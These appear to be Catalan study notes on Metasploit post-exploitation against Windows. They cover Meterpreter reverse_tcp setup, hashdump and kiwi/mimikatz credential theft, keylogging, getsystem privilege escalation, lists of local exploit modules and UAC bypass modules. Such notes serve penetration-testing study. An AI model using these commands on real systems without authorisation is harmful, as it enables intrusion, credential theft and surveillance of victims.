Postexplotació amb metasploit a Windows
Meterpreter #
-
Payload avançat que fa servir DLL injection en memòria (windows)
-
Conté un interpret de comandes
-
Amplia les capacitat de post explotació de metasploit
-
Caracterísiques
- Previngut
- meterpreterresideix completament a la memòria de la víctima i no escriu a disc.
- Fàcil migració de procés
- Es comunica per defecte amb un canal xifrat dificultant la detecció
- Extensible
- Les capacitat es carreguen directament desde la xarxa
- El payload es carrega més ràpid
- Previngut
-
Previament a l'ús de l'exploit hem de configurar meterpreter
use payload /
/meterpreter/reverse_tcp
set LHOST xxx.xxx.xxx.xxx
migrate #
- Serveix per a moure una sessió de meterpreter a un procés
Cerca amb meterpreter #
-
Amb la comanda search es poden fer cerques
- -h : help
- -d -f : directory/fitxer permet expresions regulars
-
Per exemple
meterpreter > search -d c:/ -f *.conf
Hashes #
hashdump #
- L'ordre hashdump permet descarregar les hashes windows.
- El mòdul auxiliary/analyze/jtr_crack_fast et permet fer atacs de diccionari directament sobre les hashes descarregades
mimikatz / kiwi #
- mimikatz (ara kiwi a metasploit) és un aplicació per a descobrir contrasenyes
- load kiwi : per carregar el modul desde meterpreter
Plugin espia #
- Permet fer captures de pantalla o fer de keylogger
Shell #
- Aquesta comanda et permet obrir un command prompt a la màquina víctima
Escalada de privilegis #
- Podríem explotar una vulnerabilitat i tenir accés remot amb meterpreter però no tenir privilegis
- Meterpreter ofereix la possibilitat d'escalar privilegis (windows : user a Administrator|System. Linux: user a root)
Camins #
- Explorant vulnerabilitats del sistema
- Erros de configuració del sistema
- BD, web ..
user priv i getsystem #
- Procés
- Carregar l'extenció rpiv amb use priv
- getsystem
- getuid per verificar el nivell de privilegis. Es pot combinar amb sysinfo per a que t'informi de les dades del sistema
enumpatches #
- post/windows/gather/enum_patches et mostra una llista de possibles "patches" vulnerables
- Després només hauries de cercar i usar un exploit vàlid pel patch
exploit suggester #
- post/multi/recon/local_exploit_suggester com el seu nom indica et suggereix exploits segons la plataforma i la versió
- Un cop usat i explotat getsystem
Altres exploits: #
- exploit/windows/local/m15_051_client_copy_image
- exploit/windows/local/ms10_015_kitrap0d
- exploit/windows/local/ms14_058_track_popup_menu
- exploit/windows/local/ms10_092_schelevator
- exploit/windows/local/ms16_016_webdav
- exploit/windows/local/pp3_flatten_rec
- exploit/windows/local/ms13_053_schlamperei
(...)
UAC #
- UAC : User Account controller (Desde vista)
- És un mòdul de seguretat que evita canvis no autoritzats al sistema.
- Si un procés demana canvis de sistema UAC demana permís al administrador (a no ser que ja tingui privilegis d'administrador)
- Sabrem que ens ha bloquejat UAC si després de fer getsystem (i getuid) no obtenim permisos d'administrador
Mòduls UAC #
- exploit/windows/local/ask (altament efectiu)
- exploit/windows/local/bypassuac
- exploit/windows/local/bypassuac_injection
- Hi ha més. Simplement busca UAC o bypassuac